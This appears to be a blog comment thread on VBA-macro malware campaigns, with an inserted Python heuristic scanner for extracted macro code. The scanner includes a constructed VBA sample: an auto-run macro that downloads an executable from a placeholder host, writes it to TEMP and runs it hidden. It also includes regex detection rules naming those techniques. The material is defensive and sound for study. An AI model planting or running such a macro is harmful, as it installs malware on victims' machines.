• Anonymous Steve Basford (Sanesecurity)
    2 Jan 2015 6:45 PM

    They have been on the increase for a while now...

  • Anonymous adwbust
    3 Jan 2015 12:33 PM

    That's why, after macros are enabled, warn the user if the document tries to connect out. Check the server/site contacted by the macro using SmartScreen (on Windows 10, aside from IE, integrate SmartScreen into the Windows Filtering Platform and the UAC prompt for opening a PE; why also with UAC? Because not all files are downloaded from the web, and not all use IE. Some are from USB drives; check against SmartScreen when they're run.) Office is sandboxed, right? Office should have a sandboxed incoming folder for files downloaded (and run) by a macro. If the user allows the macro to connect out and download, warn/prompt the user if the macro runs a PE or script. For downloaded web pages, images, etc., use a sandboxed viewer/browser. Put in the Office prompt that it is unusual for a document to download and run files. That would deter (scare) users.

    Does Windows keep a log to track process activity? For example, log when a file (usually a PE, document or script) is first created (including the source), run, or modified, the result of execution (if it trips certain sensors), etc. That would make it easy to track and retrieve an offending file. Of course, the user should be able to opt out. MAPS within Windows. :D
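
An added example, not part of the original comment thread or of any product mentioned in it: a small heuristic scanner over already-extracted VBA source that flags the stages the comment above wants a warning for (auto-run entry point, outbound connection, file drop, execution). It assumes the macro text has already been pulled out of the document (for instance with oletools' olevba); the two macros below are constructed for this example, and the URL in them is a reserved `.invalid` name.

```python
"""Heuristic VBA macro scan: does the macro auto-run, connect out, drop a file, run it?"""
import re
from collections import defaultdict

# One rule per stage of the "connect out, download, run" chain.
# VBA identifiers are case-insensitive, so every regex is compiled with re.I.
RULES = [
    ("autoexec", re.compile(
        r"\b(AutoOpen|Document_Open|AutoExec|Auto_Open|Workbook_Open)\b", re.I)),
    ("network", re.compile(
        r"\b(URLDownloadToFile|MSXML2\.(?:Server)?XMLHTTP|Microsoft\.XMLHTTP|"
        r"WinHttp\.WinHttpRequest|InternetOpen|InternetReadFile)\b", re.I)),
    ("filedrop", re.compile(
        r"\b(ADODB\.Stream|SaveToFile|Scripting\.FileSystemObject|"
        r"Open\s+.+?\s+For\s+Binary)\b", re.I)),
    ("execute", re.compile(
        r"(\bShell\b|\bWScript\.Shell\b|\bShellExecute\b|\bCreateProcess\w*\b|"
        r"\.Run\b|\.Exec\b)", re.I)),
    ("url", re.compile(r"https?://[^\s\"']+", re.I)),
]

# Constructed sample: the download-and-execute pattern discussed in the thread.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim http As Object, stream As Object, sh As Object
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", "http://example.invalid/update.exe", False
    http.send
    Set stream = CreateObject("ADODB.Stream")
    stream.Open
    stream.Type = 1
    stream.Write http.responseBody
    stream.SaveToFile Environ("TEMP") & "\update.exe", 2
    Set sh = CreateObject("WScript.Shell")
    sh.Run Environ("TEMP") & "\update.exe", 0, False
End Sub
'''

# Constructed sample: an auto-run macro that only edits the document itself.
BENIGN_VBA = r'''
Sub AutoOpen()
    ' Stamp the header; nothing leaves the document.
    ActiveDocument.Sections(1).Headers(1).Range.Text = "Draft"
End Sub
'''


def scan_vba(src):
    """Return {category: [(line_no, matched_text), ...]} for every rule hit.

    Lines that are pure VBA comments (leading apostrophe) are skipped so that
    commented-out code does not count as a hit.
    """
    hits = defaultdict(list)
    for n, line in enumerate(src.splitlines(), 1):
        if line.lstrip().startswith("'"):
            continue
        for cat, rx in RULES:
            for m in rx.finditer(line):
                hits[cat].append((n, m.group(0)))
    return dict(hits)


def verdict(hits):
    """Collapse the hits into a single rating for the prompt the comment asks for."""
    cats = {c for c, v in hits.items() if v}
    if {"network", "execute"} <= cats:
        return "high"      # connects out AND runs something: the chain in the comment
    if cats & {"network", "execute", "filedrop"}:
        return "medium"    # one stage present; worth a warning, not a block
    if cats:
        return "low"       # e.g. an auto-run macro that only touches the document
    return "none"


def report(src):
    """Human-readable lines, one per hit, plus the overall verdict."""
    hits = scan_vba(src)
    lines = [f"  line {n:>3}  {cat:<9} {text}"
             for cat, found in sorted(hits.items()) for n, text in found]
    return [f"verdict: {verdict(hits)}"] + lines


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(f"== {name} ==")
        print("\n".join(report(src)))
```

The rules are deliberately coarse string matches: real campaigns split strings with `Chr()` and `&` concatenation, so in practice this runs on the deobfuscated output of a tool like olevba rather than on the raw module text, and a "high" verdict is a reason to prompt or sandbox, not proof of malice.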

  • Anonymous Sandeep
    5 Jan 2015 6:08 AM

    I have an IBM server x3400 M3.
    I installed 8 GB of RAM, but the operating system can use only 3.99 GB of RAM.

    Windows Server 2008 R2.

  • Anonymous Derek Knight (MVP Consumer Security)
    5 Jan 2015 7:50 AM

    The default options and the ability to use "Protected View" were only established in Office 2010 and later versions. A very high proportion of compromised users are using Office 2007 or even earlier. We realistically are not going to see users pay several hundred £ or $ to get a new version of Office when their old one works perfectly well, with features they use every day, and there is not-so-good default protection in those versions. I don't even remember macros being disabled by default in Office 2007.

  • Anonymous Kevin Beaumont
    5 Jan 2015 8:51 PM

    This has been going on since September; detection by AV providers has been very poor on it for months now.

    Palo Alto's Unit42 has extensive blog posts about it here: http://researchcenter.paloaltonetworks.com/2014/10/examining-vba-initiated-infostealer-campaign/ and here: http://researchcenter.paloaltonetworks.com/2014/12/follow-vba-initiated-infostealer-campaign-exploring-related-malware-actors/

  • TammyRSmith TammyRSmith
    15 Jan 2015 2:16 AM

    Stay smart when opening those emails!